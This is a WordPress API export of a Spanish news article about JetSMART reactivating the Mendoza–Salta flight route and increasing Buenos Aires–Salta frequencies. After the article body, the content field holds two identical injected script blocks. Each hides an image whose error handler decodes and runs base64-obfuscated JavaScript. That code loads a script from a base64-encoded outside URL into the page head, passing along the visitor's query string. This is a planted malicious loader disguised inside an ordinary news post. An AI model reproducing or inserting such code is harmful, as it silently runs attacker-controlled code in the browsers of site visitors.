{"id":4255,"date":"2024-08-06T09:38:24","date_gmt":"2024-08-06T12:38:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4255"},"modified":"2025-08-13T23:51:36","modified_gmt":"2025-08-14T02:51:36","slug":"jetsmart-reactiva-la-ruta-aerea-mendoza-salta-e-incrementa-frecuencias-con-la-provincia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4255","title":{"rendered":"JetSMART reactiva la ruta a\u00e9rea Mendoza \u2013 Salta e incrementa frecuencias con la provincia"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-black-color has-cyan-bluish-gray-background-color has-text-color has-background has-link-color wp-elements-fb4e04776737e06368b36d726ff1a16e\"><em>La ruta con la provincia cuyana comenzar\u00e1 a operar en noviembre con cuatro frecuencias semanales y los tickets ya est\u00e1n a la venta a valores promocionales. Los vuelos entre Buenos Aires y Salta aumentar\u00e1n un 75%.<\/em><\/h3>\n\n\n\n<p>La compa\u00f1\u00eda a\u00e9rea JetSMART anunci\u00f3 su plan de expansi\u00f3n de operaciones para los pr\u00f3ximos meses con nuevas rutas y frecuencias, entre las que Salta ocupa una posici\u00f3n destacada. El ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>&nbsp;particip\u00f3 en el acto realizado en Buenos Aires.<\/p>\n\n\n\n<p>Entre los anuncios que impactan en la provincia, en noviembre se reactivar\u00e1 la ruta Mendoza \u2013 Salta con cuatro frecuencias semanales. Los pasajes para estas rutas ya est\u00e1n disponibles en www.JetSMART.com y los vuelos comenzar\u00e1n a operar a partir del \u00faltimo trimestre del a\u00f1o.<\/p>\n\n\n\n<p>El ministro Pe\u00f1a agradeci\u00f3 \u201cla confianza de la empresa con el destino Salta, en l\u00ednea con los objetivos que tenemos como destino de sumar m\u00e1s conectividad, tanto de cabotaje con todas las regiones de Argentina y en materia de vuelos internacionales\u201d. &nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13244-jetsmart-reactiva-la-ruta-aerea-mendoza-salta-e-incrementa-frecuencias-con-la-provincia.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13244-jetsmart-reactiva-la-ruta-aerea-mendoza-salta-e-incrementa-frecuencias-con-la-provincia.jpg\" alt=\"JetSMART reactiva la ruta a\u00e9rea Mendoza \u2013 Salta e incrementa frecuencias con la provincia.\"\/><\/a><\/figure>\n\n\n\n<p>El funcionario salte\u00f1o agreg\u00f3 que \u201ces una buena noticia el incremento de las frecuencias con Buenos Aires, pero tambi\u00e9n vincular las dos rutas del vino con m\u00e1s movimiento del pa\u00eds y entre dos de los destinos que m\u00e1s turistas internacionales reciben en el a\u00f1o\u201d.<\/p>\n\n\n\n<p>JetSmart entre sus novedades, inform\u00f3 que se incrementar\u00e1n en un 75% las frecuencias entre Buenos Aires y Salta; tambi\u00e9n ser\u00e1n m\u00e1s los vuelos directos entre la provincia y Neuqu\u00e9n.<\/p>\n\n\n\n<p>El anuncio fue oficializado por Estuardo Ortiz, CEO de JetSMART; V\u00edctor Mej\u00eda, Chief Commercial; y Gonzalo P\u00e9rez Corral, Country Manager de JetSMART Argentina. En el acto organizado por la empresa para dar a conocer un plan &nbsp;de operaciones, participaron el ministro de Desregulaci\u00f3n y Transformaci\u00f3n de la Naci\u00f3n, Federico Sturzenegger; el secretario de Turismo Secretario de Turismo, Ambiente y Deportes, Daniel Scioli; y el secretario de Transporte de la Naci\u00f3n, Franco Mogetta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La ruta con la provincia cuyana comenzar\u00e1 a operar en noviembre con cuatro frecuencias semanales y los tickets ya est\u00e1n a la venta a valores promocionales. Los vuelos entre Buenos Aires y Salta aumentar\u00e1n un 75%. La compa\u00f1\u00eda a\u00e9rea JetSMART anunci\u00f3 su plan de expansi\u00f3n de operaciones para los pr\u00f3ximos meses con nuevas rutas y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4256,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5,18],"tags":[],"class_list":{"0":"post-4255","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4255"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4255"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4255\/revisions"}],"predecessor-version":[{"id":6724,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4255\/revisions\/6724"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4256"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4255"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4255"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4255"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}